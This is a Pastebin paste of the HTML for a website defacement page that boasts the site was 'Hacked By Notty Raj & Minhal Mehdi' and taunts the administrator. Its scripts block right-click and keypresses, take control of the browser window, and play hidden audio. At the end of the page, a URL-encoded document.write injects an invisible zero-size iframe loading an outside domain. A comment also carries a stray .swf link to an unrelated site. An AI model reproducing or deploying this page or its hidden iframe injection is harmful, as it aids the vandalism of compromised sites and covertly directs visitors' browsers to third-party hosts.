Advertisement
Guest User

devilscafe

a guest
Jan 20th, 2012
19,239
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.02 KB | None | 0 0
  1. <html>
  2. <head>
  3. <style type="text/css">
  4. HTML,BODY{cursor: url("http://downloads.totallyfreecursors.com/cursor_files/indonesia.ani"), url("http://i55.tinypic.com/2z7ld11.gif"), auto;}
  5. </style>
  6. <meta http-equiv="content-type" content="text/html; charset=UTF-16">
  7. <meta name="verify-v1" content="WqT6kZySLLYe/gRjkWf1sNcr+RrPRuowoZD31PZAV+Q=" />
  8. <title> || Power Hackers || </title>
  9. <link rel="SHORTCUT ICON" href="http://i55.tinypic.com/2z7ld11.gif">
  10.  
  11. <center>
  12.  
  13. <img src="http://i55.tinypic.com/14uuv14.png" border="0" width="500" height="400" />
  14.  
  15.  
  16.  
  17.  
  18. <script>
  19. var message=" ___ ____ ____\n ______/ \\__// \\__/_____\\\n _/ \\_/ : //_____\\\\\n /| : : .. / \\\n || :: :: \\ /\n || :| || \\ \_____/\n || || || |\\ / |\n \\| || || | / | \\\n | || || | / /_\\ \\\n | ____ || ______ || | / / \\\n \\ _-_ / \\ _-_-_ / | ______ |/_/ \\\n _\\_-_-_-_/ \\ /\n /____ /\n / \\ /\n \\______\\_________ /\n\n\n INDIAN HACKERS [-] -=[ Hacked By Notty Raj & Minhal Mehdi ]=- [-]";
  20. ///////////////////////////////////
  21. function clickIE4(){if (event.button==2){alert(message);return false;}}
  22. function clickNS4(e){if (document.layers||document.getElementById&&!document.all){if (e.which==2||e.which==3){alert(message);return false;}}}
  23. if (document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS4;}
  24. else if (document.all&&!document.getElementById){document.onmousedown=clickIE4;}
  25. document.oncontextmenu=new Function("alert(message);return false")
  26. </script>
  27. <SCRIPT>
  28. window.scrollBy(0, 1)
  29. window.resizeTo(0,0)
  30. window.moveTo(0,0)
  31. //setInterval("move()",30);
  32. setTimeout("move()", 1);
  33. var mxm=50
  34. var mym=25
  35. var mx=0
  36. var my=0
  37. var sv=50
  38. var status=1
  39. var szx=0
  40. var szy=0
  41. var c=255
  42. var n=0
  43. var sm=30
  44. var cycle=2
  45. var done=2
  46. function move()
  47. {
  48. if (status == 1)
  49. {
  50. mxm=mxm/1.05
  51. mym=mym/1.05
  52. mx=mx+mxm
  53. my=my-mym
  54. mxm=mxm+(400-mx)/100
  55. mym=mym-(300-my)/100
  56. window.moveTo(mx,my)
  57. rmxm=Math.round(mxm/10)
  58. rmym=Math.round(mym/10)
  59. if (rmxm == 0)
  60. {
  61. if (rmym == 0)
  62. {
  63. status=2
  64. }
  65. }
  66. }
  67. if (status == 2)
  68. {
  69. sv=sv/1.1
  70. scrratio=1+1/3
  71. mx=mx-sv*scrratio/2
  72. my=my-sv/2
  73. szx=szx+sv*scrratio
  74. szy=szy+sv
  75. window.moveTo(mx,my)
  76. window.resizeTo(szx,szy)
  77. if (sv < 0.1)
  78. {
  79. status=3
  80. }
  81. }
  82. if (status == 3)
  83. {
  84. document.fgColor=0xffffFF
  85. c=c-16
  86. if (c<0)
  87. {status=8}
  88. }
  89. if (status == 4)
  90. {
  91. c=c+16
  92. document.bgColor=c*65536
  93. document.fgColor=(255-c)*65536
  94. if (c > 239)
  95. {status=5}
  96. }
  97. if (status == 5)
  98. {
  99. c=c-16
  100. document.bgColor=c*65536
  101. document.fgColor=(255-c)*65536
  102. if (c < 0)
  103. {
  104. status=6
  105. cycle=cycle-1
  106. if (cycle > 0)
  107. {
  108. if (done == 1)
  109. {status=7}
  110. else
  111. {status=4}
  112. }
  113. }
  114. }
  115. if (status == 6)
  116. {
  117. document.title = "Cljck"
  118. alert("Cljck")
  119. cycle=2
  120. status=4
  121. done=1
  122. }
  123. if (status == 7)
  124. {
  125. c=c+4
  126. document.bgColor=c*65536
  127. document.fgColor=(255-c)*65536
  128. if (c > 128)
  129. {status=8}
  130. }
  131. if (status == 8)
  132. {
  133. window.moveTo(0,0)
  134. sx=screen.availWidth
  135. sy=screen.availHeight
  136. window.resizeTo(sx,sy)
  137. status=9
  138. }
  139. var timer=setTimeout("move()",0.3)
  140. }
  141. </SCRIPT>
  142.  
  143.  
  144.  
  145. <script language="javascript">
  146. function keypressed() {
  147. alert("Hacked By: -=[ Notty Raj & Minhal Mehdi ]=-");
  148. }
  149. document.onkeydown=keypressed;
  150. // End -->
  151. </script>
  152.  
  153. <script>
  154. TypingText = function(element, interval, cursor, finishedCallback) {
  155. if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  156. this.running = true; // Never run.
  157. return;
  158. }
  159. this.element = element;
  160. this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  161. this.interval = (typeof interval == "undefined" ? 100 : interval);
  162. this.origText = this.element.innerHTML;
  163. this.unparsedOrigText = this.origText;
  164. this.cursor = (cursor ? cursor : "");
  165. this.currentText = "";
  166. this.currentChar = 0;
  167. this.element.typingText = this;
  168. if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  169. TypingText.all.push(this);
  170. this.running = false;
  171. this.inTag = false;
  172. this.tagBuffer = "";
  173. this.inHTMLEntity = false;
  174. this.HTMLEntityBuffer = "";
  175. }
  176. TypingText.all = new Array();
  177. TypingText.currentIndex = 0;
  178. TypingText.runAll = function() {
  179. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  180. }
  181. TypingText.prototype.run = function() {
  182. if(this.running) return;
  183. if(typeof this.origText == "undefined") {
  184. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience. http://www.lozere.maisons-paysannes.org/media/erne.swf
  185. return;
  186. }
  187. if(this.currentText == "") this.element.innerHTML = "";
  188. // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
  189. if(this.currentChar < this.origText.length) {
  190. if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  191. this.tagBuffer = "<";
  192. this.inTag = true;
  193. this.currentChar++;
  194. this.run();
  195. return;
  196. } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  197. this.tagBuffer += ">";
  198. this.inTag = false;
  199. this.currentText += this.tagBuffer;
  200. this.currentChar++;
  201. this.run();
  202. return;
  203. } else if(this.inTag) {
  204. this.tagBuffer += this.origText.charAt(this.currentChar);
  205. this.currentChar++;
  206. this.run();
  207. return;
  208. } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  209. this.HTMLEntityBuffer = "&";
  210. this.inHTMLEntity = true;
  211. this.currentChar++;
  212. this.run();
  213. return;
  214. } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  215. this.HTMLEntityBuffer += ";";
  216. this.inHTMLEntity = false;
  217. this.currentText += this.HTMLEntityBuffer;
  218. this.currentChar++;
  219. this.run();
  220. return;
  221. } else if(this.inHTMLEntity) {
  222. this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  223. this.currentChar++;
  224. this.run();
  225. return;
  226. } else {
  227. this.currentText += this.origText.charAt(this.currentChar);
  228. }
  229. this.element.innerHTML = this.currentText;
  230. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  231. this.currentChar++;
  232. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  233. } else {
  234. this.currentText = "";
  235. this.currentChar = 0;
  236. this.running = false;
  237. this.finishedCallback();
  238. }
  239. }
  240. </script>
  241. <style>
  242. body {
  243. padding:0;
  244. margin:0;
  245. background-repeat: no-repeat;
  246. background-position:tile;
  247. background-color: black;
  248. color: #000000;
  249. font: normal 100% Courier;
  250. margin-top: 0px;
  251. margin-left: 0px;
  252. padding: 0;
  253. margin-right: 0px;
  254. }
  255. </style>
  256. </head>
  257. <body bgcolor="black">
  258. <!-- --><script type="text/javascript">if(typeof(urchinTracker)=='function'){_uacct="UA-230305-2";_udn="none";_uff=false;urchinTracker();}</script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> <script type="text/javascript">_qacct="p-44naSaXtNJt26";quantserve();</script> </body></noframes><body bgcolor="#000000"><center>
  259.  
  260.  
  261.  
  262.  
  263. <h1><center><font face="abadon" size="24<center><noscript></noscript><!-- --><script type="text/javascript" src="http://www.freewebs.com/p.js"></script><script>
  264. farbbibliothek = new Array();
  265. farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
  266. farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00");
  267. farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");
  268. farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
  269. farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
  270. farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");
  271. farbbibliothek[6] = new Array("#0000FF","#FFFF00");
  272. farben = farbbibliothek[4];
  273. function farbschrift()
  274. {
  275. for(var i=0 ; i<Buchstabe.length; i++)
  276. {
  277. document.all["a"+i].style.color=farben[i];
  278. }
  279. farbverlauf();
  280. }
  281. function string2array(text)
  282. {
  283. Buchstabe = new Array();
  284. while(farben.length<text.length)
  285. {
  286. farben = farben.concat(farben);
  287. }
  288. k=0;
  289. while(k<=text.length)
  290. {
  291. Buchstabe[k] = text.charAt(k);
  292. k++;
  293. }
  294. }
  295. function divserzeugen()
  296. {
  297. for(var i=0 ; i<Buchstabe.length; i++)
  298. {
  299. document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>");
  300. }
  301. farbschrift();
  302. }
  303. var a=1;
  304. function farbverlauf()
  305. {
  306. for(var i=0 ; i<farben.length; i++)
  307. {
  308. farben[i-1]=farben[i];
  309. }
  310. farben[farben.length-1]=farben[-1];
  311.  
  312. setTimeout("farbschrift()",30);
  313. }
  314. // Zu Demonstrationszwecken*****************
  315. var farbsatz=1;
  316. function farbtauscher()
  317. {
  318. farben = farbbibliothek[farbsatz];
  319. while(farben.length<text.length)
  320. {
  321. farben = farben.concat(farben);
  322. }
  323. farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
  324. }
  325. setInterval("farbtauscher()",4500);
  326. text= " hAckeD bY Minhal Mehdi & Notty Raj ";
  327. //h
  328. string2array(text);
  329. divserzeugen();
  330. //document.write(text);
  331. //
  332. /*function expand() {
  333. for(x = 0; x < 50; x++) {
  334. window.moveTo(screen.availWidth * -(x - 50) / 100, screen.availHeight * -(x - 50) / 100);
  335. window.resizeTo(screen.availWidth * x / 50, screen.availHeight * x / 50);
  336. }
  337. window.moveTo(0,0);
  338. window.resizeTo(screen.availWidth, screen.availHeight);
  339. }
  340. expand();*/
  341. </script></font></h1><br>
  342. <img src="http://i749.photobucket.com/albums/xx135/febry17sulis/hyzt3r14.gif" alt="" border="0">
  343. <h2><font face='Courier'><center> <FONT color=#FF0000>---==[+| Power Hackers |+]==--- </center></h2>
  344. <div id="example1"> <FONT color=#FF0000> Today's Update : Website Has Been Hacked By Notty Raj & Minhal Mehdi^ </div>
  345. <img src="http://i749.photobucket.com/albums/xx135/febry17sulis/hyzt3r14.gif" alt="" border="0">
  346. <h2><font face='Courier'><center> <FONT color=#FF0000> ---==[+| INDIAN HACKERS |+]==--- </center></h2>
  347. <div id="example3"> <FONT color=#FFFF00> ^ Live For INDIA or Leave INDIA ^ </div>
  348.  
  349.  
  350. <STYLE type=text/css>.matrix {
  351. PADDING-RIGHT: 0px; PADDING-LEFT: 0px; FONT-SIZE: 10pt; PADDING-BOTTOM: 0px; MARGIN: 0px; WIDTH: 10px; PADDING-TOP: 0px; FONT-FAMILY: Lucida Console, Courier, Monotype; TEXT-ALIGN: center
  352. }
  353. </STYLE>
  354. <a href="http://devilscafe.co.cc" title="weLcome To Hacking world"><img src="http://i749.photobucket.com/albums/xx135/febry17sulis/hyzt3r14.gif" alt="" border="0"></a><br><a href="http://devilscafe.co.cc" title="weLcoMe"></a>
  355. <P></P>
  356. <SCRIPT language=JavaScript>
  357. msg = new Array(); //strings written in screen
  358. msg[0] = "<h2><font face='Courier'><center> ---==[+|<FONT color=#00FF00> |+]==---</center></h2>";
  359. msg[1] = "<b> </font> <font face='Courier' color='#00FF00'></font>";
  360. msg[2] = "<font face='Courier' color='#00FF00'>Power Hackers</font>";
  361. msg[3] = "<font face='Courier' color='#00FF00'> <{+=================+}>";
  362. msg[4] = "<font face='Courier' color='#00FF00'><~~~~~~~~~~~~~~~</font>";
  363. text1 = ""; //the same as text2, only the last character is highlighted
  364. text2 = ""; //current string, which will be written
  365. count = 0; //char index in string text
  366. count2 = 0; //number of strings
  367. text = msg[0].split(""); //text - string written
  368. function writetext() { //show strings above on screen
  369. text1 = text2 + "<font color='#00FF00'>" + text[count] + "</font>";
  370. text2 += text[count];
  371. document.all["nothing"].innerHTML = text1; //where to write
  372.  
  373. if (count < text.length-1){
  374. count++;
  375. setTimeout('writetext()', 25);
  376. }
  377. else { //if this string is written, get the new string
  378. count = 0;
  379. if (count2 != 4) { //write 4 strings
  380. count2++;
  381. text2 += "<p>"; //a new line
  382. text = eval('msg['+count2+'].split("")'); //get the new string to text
  383. setTimeout('writetext()', 25);
  384. }
  385. }
  386. }
  387. </SCRIPT>
  388. <h2><font face='Courier'><center> <FONT color=#FF0000>---==[+| For ADMIN |+]==---</center></h2>
  389. <p id="example2"> <FONT color=#00FF00> ==> BuT, This'z just WARNING For You,, So you know that Your SECURITY is sTiLL LACKING and there are many HOLES in your SYSTEM.... , Don'T WORRY,, Your Database is SAFE ==> So, Please Patch Your System . . . and Thnk'z . . .</p>
  390. <img src="http://i749.photobucket.com/albums/xx135/febry17sulis/hyzt3r14.gif" alt="" border="0">
  391. <h2><font face='Courier'><center> <FONT color=#FF0000>---==[+| Hacked By Notty Raj & Minhal Mehdi |+]==--- </center></h2>
  392.  
  393. <font face='Segoe Print' color='#FFFF00'><marquee> </font></marquee>
  394. <h2><font face='Courier'><center> <FONT color=#FF0000>---==[+| follow this web site |+]==---</center></h2>
  395. <blink><b><font size="11" face="Segoe Print" color="lime"> ---=[+| Devilscafe.co.cc |+]==---</font></b> </blink>
  396.  
  397.  
  398.  
  399.  
  400.  
  401. <img src="http://i749.photobucket.com/albums/xx135/febry17sulis/hyzt3r14.gif" alt="" border="0">
  402.  
  403. <script type="text/javascript">
  404. //Define first typing example:
  405. new TypingText(document.getElementById("example1"), 250, function(i){
  406. var ar = new Array("===>>","===>>","===>>","===>>"); return " " + ar[i.length %
  407. ar.length]; });
  408. //Define second typing example (use "slashing" cursor at the end):
  409. new TypingText(document.getElementById("example2"), 250, function(i){
  410. var ar = new Array("\\","|","/","-"); return " " + ar[i.length %
  411. ar.length]; });
  412. //Define second typing example (use "slashing" cursor at the end):
  413. new TypingText(document.getElementById("example3"), 250, function(i){
  414. var ar = new Array("\\","|","/","-"); return " " + ar[i.length %
  415. ar.length]; });
  416. //Type out examples:
  417. TypingText.runAll();
  418.  
  419. </script>
  420.  
  421. <p align="center">
  422. </p>
  423. <script type="text/javascript">
  424. // ------------------------------------------------------------------------------------
  425. // Matrix Code By BaghazzHck23
  426. // ------------------------------------------------------------------------------------
  427. var theinHTML;
  428. var thelessstr;
  429. var ascSt=22;
  430. var ascEnd=126;
  431. var numoflines = 28;
  432. var lines = new Array();
  433. var intervalID = new Array();
  434. var subIntervalID = new Array();
  435. var subIntervalID2 = new Array();
  436. var scH = screen.height-220;
  437. var scW = screen.width-50;
  438. window.onload = createlines;
  439. // -------------------------------------------------------------------------------------
  440. // Convert decimal to hex (for the colour)
  441. var hD="0123456789ABCDEF";
  442. function d2h(d)
  443. {
  444. var h = hD.substr(d&15,1);
  445. while(d > 15)
  446. {
  447. d >>= 4;
  448. h = hD.substr(d&15,1)+h;
  449. }
  450. return h;
  451. }
  452. // -------------------------------------------------------------------------------------
  453. // The line object
  454. function line(length, maxlength, chars, speed, x)
  455. {
  456. this.length = length;
  457. this.maxlength = maxlength;
  458. this.chars = chars;
  459. this.speed = speed;
  460. this.x = x;
  461. }
  462. // -------------------------------------------------------------------------------------
  463. // Creates the lines
  464. function createlines()
  465. {
  466. // create the lines as objects as defined above with length, characters, speed, x-value
  467. for(var eachline = 0; eachline < numoflines; eachline++)
  468. {
  469. lines[eachline] = new line(0, Math.round(Math.random()*15+5), String.fromCharCode(Math.round(Math.random()*(ascEnd-ascSt)+ascSt)), Math.round(Math.random()*400+100), eachline*45);
  470. }
  471. // write the lines
  472. for(var writelines = 0; writelines < numoflines; writelines++)
  473. {
  474. var newline = document.createElement("div");
  475. newline.id = "char" + writelines;
  476. newline.style.position = "absolute";
  477. newline.style.top = "5px";
  478. newline.style.left = lines[writelines].x + "px";
  479. var firstchar = document.createElement("div");
  480. var newcolor = d2h(Math.round(1/(lines[writelines].maxlength+1)*255));
  481. if(newcolor.length == 1)
  482. newcolor = "0" + newcolor;
  483. firstchar.style.color = "#00"+newcolor+"00"
  484. firstchar.innerHTML = lines[writelines].chars
  485. newline.appendChild(firstchar);
  486. document.body.appendChild(newline);
  487. }
  488. start();
  489. }
  490. // -------------------------------------------------------------------------------------
  491. // Starts it moving & changing
  492. function start()
  493. {
  494. for(var pickastring = 0; pickastring < numoflines; pickastring++)
  495. {
  496. intervalID[pickastring] = setInterval("addchars("+pickastring+")", lines[pickastring].speed);
  497. }
  498. }
  499. // -------------------------------------------------------------------------------------
  500. // Add random characters to the string (and a line break)
  501. // and make sure the last one is light
  502. // once it gets to maxlength start moving down
  503. function addchars(theline)
  504. {
  505. if(lines[theline].length >= lines[theline].maxlength)
  506. {
  507. clearInterval(intervalID[theline]);
  508. subIntervalID[theline] = setInterval("movethestring("+theline+")", lines[theline].speed);
  509. }
  510. else
  511. {
  512. // Get a char (not " or ' or \ or it'll get confused)
  513. myRandomChar = String.fromCharCode(Math.round(Math.random()*(ascEnd-ascSt)+ascSt));
  514. while(myRandomChar == "'" || myRandomChar == '"' || myRandomChar == "\\")
  515. myRandomChar = String.fromCharCode(Math.round(Math.random()*(ascEnd-ascSt)+ascSt));
  516. // Make a new div for it (so we can change it's colour)
  517. var newchar = document.createElement("div");
  518. newchar.innerHTML = myRandomChar;
  519. document.getElementById("char"+theline).appendChild(newchar);
  520. // Colour it
  521. var i;
  522. for(i = 0; i <= lines[theline].length; i++)
  523. {
  524. var newcolor = d2h(Math.round((i+1)/(lines[theline].maxlength+1)*255));
  525. newcolor = "" + newcolor;
  526. if(newcolor.length == 1)
  527. newcolor = "0" + newcolor;
  528. document.getElementById("char"+theline).childNodes[i].style.color = "#00" + newcolor + "00";
  529. document.getElementById("char"+theline).childNodes[i].style.fontWeight = "normal";
  530. }
  531. document.getElementById("char"+theline).childNodes[i].style.color = "#99FF99";
  532. document.getElementById("char"+theline).childNodes[i].style.fontWeight = "bold";
  533. // Increase length by one
  534. lines[theline].length++;
  535. }
  536. }
  537. // -------------------------------------------------------------------------------------
  538. // Moves the string (creates and destroys chars)
  539. function movethestring(theline)
  540. {
  541. var topstringnum = document.getElementById("char"+theline).offsetTop;
  542. if((topstringnum + (lines[theline].maxlength * 15)) >= scH)
  543. {
  544. clearInterval(subIntervalID[theline]);
  545. subIntervalID2[theline] = setInterval("clearletters("+theline+")", lines[theline].speed);
  546. }
  547. else
  548. {
  549. // create
  550. myRandomChar = String.fromCharCode(Math.round(Math.random()*(ascEnd-ascSt)+ascSt));
  551. while(myRandomChar=="'" || myRandomChar=='"' || myRandomChar=="\\")
  552. myRandomChar = String.fromCharCode(Math.round(Math.random()*(ascEnd-ascSt)+ascSt));
  553. var newchar = document.createElement("div");
  554. newchar.innerHTML = myRandomChar;
  555. document.getElementById("char"+theline).appendChild(newchar);
  556. // delete
  557. document.getElementById("char"+theline).removeChild(document.getElementById("char"+theline).childNodes[0]);
  558. // re-colour
  559. var i;
  560. for(i = 0; i < lines[theline].length; i++)
  561. {
  562. var newcolor = d2h(Math.round((i+1)/(lines[theline].maxlength+1)*255));
  563. newcolor = "" + newcolor;
  564. if(newcolor.length == 1)
  565. newcolor = "0" + newcolor;
  566. document.getElementById("char"+theline).childNodes[i].style.color = "#00" + newcolor + "00";
  567. document.getElementById("char"+theline).childNodes[i].style.fontWeight = "normal";
  568. }
  569. document.getElementById("char"+theline).childNodes[i].style.color = "#99FF99";
  570. document.getElementById("char"+theline).childNodes[i].style.fontWeight = "bold";
  571. // move
  572. document.getElementById("char"+theline).style.top = (topstringnum+15) + "px";
  573. }
  574. }
  575. // -------------------------------------------------------------------------------------
  576. // pretty much the opposite of addchars()
  577. function clearletters(theline)
  578. {
  579. if(lines[theline].length <= -1)
  580. {
  581. clearInterval(subIntervalID2[theline]);
  582. document.getElementById("char"+theline).style.top = 0;
  583. intervalID[theline] = setInterval("addchars("+theline+")", lines[theline].speed);
  584. }
  585. else
  586. {
  587. // Remove the first character
  588. document.getElementById("char"+theline).removeChild(document.getElementById("char"+theline).childNodes[document.getElementById("char"+theline).childNodes.length-1]);
  589. // Move it down by 15px
  590. var topstringnum = document.getElementById("char"+theline).offsetTop;
  591. document.getElementById("char"+theline).style.top = topstringnum+15 + "px";
  592. // Decrease length by one
  593. lines[theline].length--;
  594. }
  595. }
  596. </script>
  597. <script type="text/javascript">
  598. <!--//
  599. function tb9_makeArray(n){
  600. this.length = n;
  601. return this.length;
  602. }
  603. tb9_messages = new tb9_makeArray(4);
  604. tb9_messages[0] = " <===== hacked By Notty Raj & Minhal Mehdi =====> ";
  605. tb9_messages[1] = "-=Power Hackers=-";
  606. tb9_messages[2] = "Indian Hackers Te4m";
  607. tb9_messages[3] = "Greetz To Notty Nikki, Team NUTS, IndiShell & W.O.H.";
  608. tb9_messages[4] = "<========== P0w3R H4CK3R ==========>";
  609. tb9_messages[5] = " <===== hacked By Minhal Mehdi & Notty Raj =====> ";
  610. tb9_rptType = 'infinite';
  611. tb9_rptNbr = 5;
  612. tb9_speed = 75;
  613. tb9_delay = 2000;
  614. var tb9_counter=1;
  615. var tb9_currMsg=0;
  616. var tb9_timerID = null
  617. var tb9_bannerRunning = false
  618. var tb9_state = ""
  619. tb9_clearState()
  620. function tb9_stopBanner() {
  621. if (tb9_bannerRunning)
  622. clearTimeout(tb9_timerID)
  623. tb9_timerRunning = false
  624. }
  625. function tb9_startBanner() {
  626. tb9_stopBanner()
  627. tb9_showBanner()
  628. }
  629. function tb9_clearState() {
  630. tb9_state = ""
  631. for (var i = 0; i < tb9_messages[tb9_currMsg].length; ++i) {
  632. tb9_state += "0"
  633. }
  634. }
  635. function tb9_showBanner() {
  636. if (tb9_getString()) {
  637. tb9_currMsg++
  638. if (tb9_messages.length <= tb9_currMsg) {
  639. if ((tb9_rptType == 'finite') && (tb9_counter==tb9_rptNbr)){
  640. tb9_stopBanner();
  641. return;
  642. }
  643. tb9_counter++;
  644. tb9_currMsg=0;
  645. }
  646. tb9_clearState()
  647. tb9_timerID = setTimeout("tb9_showBanner()", tb9_delay)
  648. }
  649. else {
  650. var tb9_str = ""
  651. for (var j = 0; j < tb9_state.length; ++j) {
  652. tb9_str += (tb9_state.charAt(j) == "1") ? tb9_messages[tb9_currMsg].charAt(j) : "___"
  653. }
  654. document.title = tb9_str
  655. tb9_timerID = setTimeout("tb9_showBanner()", tb9_speed)
  656. }
  657. }
  658. function tb9_getString() {
  659. var full = true
  660. for (var j = 0; j < tb9_state.length; ++j) {
  661. if (tb9_state.charAt(j) == 0)
  662. full = false
  663. }
  664. if (full) return true
  665. while (1) {
  666. var num = tb9_getRandom(tb9_messages[tb9_currMsg].length)
  667. if (tb9_state.charAt(num) == "0")
  668. break
  669. }
  670. tb9_state = tb9_state.substring(0, num) + "1" + tb9_state.substring(num + 1, tb9_state.length)
  671. return false
  672. }
  673. function tb9_getRandom(max) {
  674. var now = new Date()
  675. var num = now.getTime() * now.getSeconds() * Math.random()
  676. return num % max
  677. }
  678. tb9_startBanner()
  679. </script>
  680. </body>
  681. </html><script>
  682. <!--
  683. document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E"));
  684. //-->
  685. </script>
  686. <embed src="http://www60.indowebster.com/p5dt6tcxo655ta70qxc5b5f32ihnxmj7.mp3?d85351ae7c808037766e1605f72f8933" autostart="TRUE" loop="TRUE" repeat="TRUE" width="0" height="0" align="CENTER"></embed>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement